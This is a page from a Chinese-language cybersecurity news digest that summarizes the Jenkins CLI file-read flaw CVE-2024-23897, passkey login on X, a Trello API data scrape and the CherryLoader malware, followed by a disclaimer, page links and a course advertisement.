https://www.jenkins.io/security/advisory/2024-01-24/ 开源持续集成/持续交付和部署 (CI/CD) 自动化软件 Jenkins 的维护者已经解决了九个安全漏洞,其中包括一个严重错误,如果成功利用该错误,可能会导致远程代码执行 (RCE)。该问题被分配了 CVE 标识符CVE-2024-23897,被描述为通过内置命令行界面 ( CLI )的任意文件读取漏洞。“在处理 CLI 命令时,Jenkins 使用 args4j 库来解析 Jenkins 控制器上的命令参数和选项,”维护人员在周三的公告中表示。“此命令解析器具有一个功能,可以将参数中的
8、X应用程序为美国iOS用户添加安全密钥登录支持
https://help.twitter.com/en/managing-your-account/how-to-use-passkey X(前身为 Twitter)今天宣布,美国的 iOS 用户现在可以使用密码登录其帐户。密钥将链接到生成密钥的 iOS 设备,并通过提供针对网络钓鱼攻击的保护并阻止未经授权的访问尝试,显着降低泄露风险。他们还将通过消除记住复杂密码的需要来增强用户体验和安全性。“密钥充当与您的帐户关联的在线凭证。您的私人密钥无需使用用户名和密码登录您的帐户,而是使用服务器的公共密钥自动验证您的帐户,从而使您无需输入密码即可登录,”X 帮助中心的支持文档解释道。“使用 iClo
9、攻击者滥用API功能泄露1500万条Trello数据拓展邮箱信息
https://www.bleepingcomputer.com/news/security/trello-api-abused-to-link-email-addresses-to-15-million-accounts/ 公开的 Trello API 允许将私人电子邮件地址与 Trello 帐户链接,从而创建数百万个包含公共和私人信息的数据配置文件。Trello 是 Atlassian 旗下的在线项目管理工具,企业通常使用它来将数据和任务组织到看板、卡片和列表中。上周,一名化名“emo”的人试图在一个流行的黑客论坛上出售 15115516 名 Trello 成员的数据,从而传出 Trel
10、新型CherryLoader恶意软件伪装成CherryTree发起攻击
https://arcticwolf.com/resources/blog/cherryloader-a-new-go-based-loader-discovered-in-recent-intrusions/ 研究人员在野外发现了一种名为CherryLoader的新的基于 Go 的恶意软件加载程序,可以将额外的有效负载传递到受感染的主机上以进行后续利用。该加载程序的图标和名称伪装成合法的 CherryTree 笔记应用程序,以欺骗潜在受害者安装它。CherryLoader 被用来删除两个权限升级工具 PrintSpoofer 或 JuicyPotatoNG 之一,然后运行批处理文件以在受害
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

